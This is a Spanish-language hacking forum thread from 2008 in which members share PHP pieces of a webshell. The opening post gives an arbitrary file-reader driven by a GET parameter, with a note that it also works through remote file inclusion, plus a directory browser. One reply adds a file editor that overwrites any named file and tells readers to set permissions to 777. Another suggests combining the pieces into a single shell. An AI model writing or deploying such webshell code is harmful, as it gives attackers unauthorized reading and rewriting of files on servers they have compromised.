Junio 22, 2018, 03:31:01 am

Autor Tema: Ver Sources de archivos =D  (Leído 3190 veces)

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado The X-C3LL

  • Troll Profesional
  • Moderador Global
  • *****
  • Mensajes: 2462
  • Sexo: Masculino
  • Bitches, I have my powers again!
    • Ver Perfil
    • 0V3RL04D 1N TH3 N3T
Ver Sources de archivos =D
« en: Abril 27, 2008, 03:10:52 pm »
Bien, aquí os dejo una parte de una WebShell que estoy codeando para ArgeniversoHack:

Código: You are not allowed to view links. Register or Login
<?php
if(isset($_GET['source'])){
$source=explode('/',$_GET['source']);
$sourceb=array_reverse($source);
$asf=$_GET["source"];
echo 
'<div style="top: 123%"><textarea cols="100" rows="30" READONLY color=red>';
@
$lectura=fopen($_GET['source'],'r');
@
$lectura=fread($lectura,filesize($asf));
/*Esto es imrpotante, así evitamos ejecutar html */
echo htmlentities($lectura);
echo 
'</textarea></div><!--';
exit();
}
?>


El archivo que queramos ver, debe de estar en nuestro servidor (a menos que sea un RFI ;D). Simplemente pondríamos nuestroarchivo.php?source=AquirutaYaRcHiVo

Esto viene bien unido a un listador de archivos...:

Código: You are not allowed to view links. Register or Login
<?php
if($_GET['path']==""){
$lala=dirname($lugarshell);
@
$directorio=dir($lala);
$ruta=$lala;
}
else{
@
$directorio=dir($_GET['path']);
$ruta=$_GET['path'];

}
?>

<?php 
$path
="$ruta"
$directorio=dir($path); 

echo 
"<br><br>"

while (
$archivo $directorio->read()) 
/* Con esto voy a intentar hacer que cuando sea un directorio, haga ?path, para ir a ese directorio*/

  
$extension=filetype($ruta.'/'.$archivo);
 if (
$extension=="dir"){
 echo 
"<font color=red><b>(<a href=?path=$ruta/$archivo>$archivo</a>)</b></font><br>"

}
/* Y si en vez de ser un directorio, es un archivo, vemos su Codigo Fuente =D */
else {
echo 
"<a href=?source=$ruta/$archivo>$archivo</a><br>"
}

$directorio->close(); 
echo 
"<br><br>";
?>

Es normal que las variables no sepais que son (como lugarshell). $lugarshell=$_SERVER[SCRIPT_FILENAME]

Bytes a todos.
« Última modificación: Abril 27, 2008, 03:12:02 pm por vengador de las sombras »
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login
You are not allowed to view links. Register or Login - You are not allowed to view links. Register or Login

Desconectado »NaSH

  • Yo vivo en CPH
  • ***
  • Mensajes: 876
  • Sexo: Masculino
  • --[[ ]]
    • Ver Perfil
    • http://img122.imageshack.us/img122/5388/windowsramutohv2rx9.jpg
Re: Ver Sources de archivos =D
« Respuesta #1 en: Abril 27, 2008, 04:33:35 pm »
Aunque leo y leo no lo entiendo xDDDD
Como hago para hacerlo funcionar :P
No entendi estas partes

Citar
Simplemente pondríamos nuestroarchivo.php?source=AquirutaYaRcHiVo

Citar
listador de archivos

Desconectado DarkAngel

  • Yo vivo en CPH
  • ***
  • Mensajes: 581
  • Sexo: Masculino
    • Ver Perfil
Re: Ver Sources de archivos =D
« Respuesta #2 en: Abril 27, 2008, 06:28:35 pm »
Es bastante simple, por lo que vi en el primer código lo que hace es capturar la variable "source" que se pasa por el método "get" y muestra el contenido del archivo pasado por "get" en un textarea no modificable y usa la función htmlentities para que se muestren los tags html como texto común y corriente.

El segundo no lo he leído todavía.

En conclusión, si quieres hacer funcionar el primero, simplemente copias y pegas el código, lo guardas como archivo.php, lo subes a algún servidor, y lo abres así:

You are not allowed to view links. Register or Login

siendo NOMBREARCHIVO.extencion cualquier archivo, como por ejemplo hola.html o quetal.html
You are not allowed to view links. Register or Login[/img]
knowledge is power...

Desconectado »NaSH

  • Yo vivo en CPH
  • ***
  • Mensajes: 876
  • Sexo: Masculino
  • --[[ ]]
    • Ver Perfil
    • http://img122.imageshack.us/img122/5388/windowsramutohv2rx9.jpg
Re: Ver Sources de archivos =D
« Respuesta #3 en: Abril 28, 2008, 10:58:47 am »
Muchas gracias  ;D
la extension tiene que ser html o puede ser cualquiera??

Desconectado The X-C3LL

  • Troll Profesional
  • Moderador Global
  • *****
  • Mensajes: 2462
  • Sexo: Masculino
  • Bitches, I have my powers again!
    • Ver Perfil
    • 0V3RL04D 1N TH3 N3T
Re: Ver Sources de archivos =D
« Respuesta #4 en: Abril 28, 2008, 11:04:39 am »

.txt, .html, .php, etc

Si lo subes a un server verás el funcionamiento. Como dijo DarkAngel es muy simple, pero a mi me sirve mucho para ver los archivos que hay en el directorio XD.



Desconectado Dacan

  • Me das tu IP?
  • *
  • Mensajes: 11
    • Ver Perfil
Re: Ver Sources de archivos =D
« Respuesta #5 en: Junio 30, 2008, 02:18:40 pm »
Yo Tengo algo mejor Mira el Source y lo Puede Modificar:


<? 
$fichero $_GET["fichero"];
$texto $_POST["texto"];
if(
$texto != ''){
   if(
$fp fopen($fichero,"w+")){
      
fwrite($fp,stripslashes($texto));
      echo 
'Archivo modificado<br><br>';
   }
   
fclose($fp);
}
$fp fopen($fichero,"r"); 
$contenido fread ($fpfilesize ($fichero));
fclose($fp);
echo 
"<form method=\"POST\"><textarea name=\"texto\"$contenido</textarea><br><input type=\"Submit\" value=\"Guardar\"></form>";
?>  


Dale permisos 777.

Saludos, Dacan  :D

Desconectado carlmycol

  • Yo vivo en CPH
  • ***
  • Mensajes: 1357
  • Sexo: Masculino
    • Ver Perfil
Re: Ver Sources de archivos =D
« Respuesta #6 en: Junio 30, 2008, 05:55:57 pm »
Esta muy buena el primero lo que haces es tomar el texto que esta dentro del archivo, filtrarle los caracteres html y mostrar, es muy util, el segundo abra el directorio y lo revisa.

Quedaria unir los dos y hacer una variable get para interactuar entre los dos codigos

Algo como

Código: You are not allowed to view links. Register or Login
$opcion=$_GET['opcion'];
switch($opcion) {
case "ver": {
        .......Se muestran archivos en directorio raiz............
}
case "source": {
         .........Se muestra codigo de archivo..........
}
}

Y se interactual las funsiones a travez se links ;) como ?opcion=source =P

Buen aporte.

salu2
« Última modificación: Junio 30, 2008, 05:57:41 pm por carlmycol »
Pregúntate: ¿Qué estás dispuesto a sacrificar por alcanzar tus objetivos?

Desconectado Dacan

  • Me das tu IP?
  • *
  • Mensajes: 11
    • Ver Perfil
Re: Ver Sources de archivos =D
« Respuesta #7 en: Julio 06, 2008, 08:56:34 am »
Carlmycol intetare lo que dices y modifico el codigo.

Saludos, Dacan  ;)


xx
Sources de un .EXE

Iniciado por hackhalo

3 Respuestas
1595 Vistas
Último mensaje Marzo 06, 2011, 07:37:16 am
por cibergolen
question
Pedido de sources

Iniciado por inferNET

1 Respuestas
1277 Vistas
Último mensaje Julio 20, 2009, 07:01:29 pm
por .vZ'~
xx
Donde encontrar sources?

Iniciado por brodyx

5 Respuestas
1669 Vistas
Último mensaje Octubre 16, 2009, 04:01:21 am
por claroscuro
exclamation
[F.A.Q]Información, tutoriales y sources

Iniciado por WaesWaes

0 Respuestas
16795 Vistas
Último mensaje Enero 27, 2012, 03:52:00 pm
por WaesWaes
xx
Línea 55 mal formada en lista de fuentes /etc/apt/sources.list

Iniciado por cspowerdj

3 Respuestas
1579 Vistas
Último mensaje Noviembre 16, 2010, 11:10:40 am
por Rcart
resuelto
E: Línea 55 mal formada en lista de fuentes /etc/apt/sources.list (análisis de d

Iniciado por lealesdibua

4 Respuestas
3311 Vistas
Último mensaje Noviembre 15, 2010, 08:39:09 pm
por .xAk.
xx
Upload de archivos - Subir archivos al servidor

Iniciado por shevchenko

0 Respuestas
2088 Vistas
Último mensaje Julio 11, 2008, 09:36:09 am
por shevchenko
resuelto
[S]Diferencias entre archivos .BAT y archivos .CMD?

Iniciado por SpyX

3 Respuestas
3656 Vistas
Último mensaje Marzo 06, 2010, 12:41:56 pm
por bolivianito
xx
Gestión de archivos por PHP (manejando archivos)

Iniciado por vart001

0 Respuestas
2130 Vistas
Último mensaje Agosto 09, 2006, 09:03:39 pm
por vart001
xx
archivos txt

Iniciado por ninjahugo

4 Respuestas
1856 Vistas
Último mensaje Noviembre 26, 2010, 02:56:21 am
por ninjahugo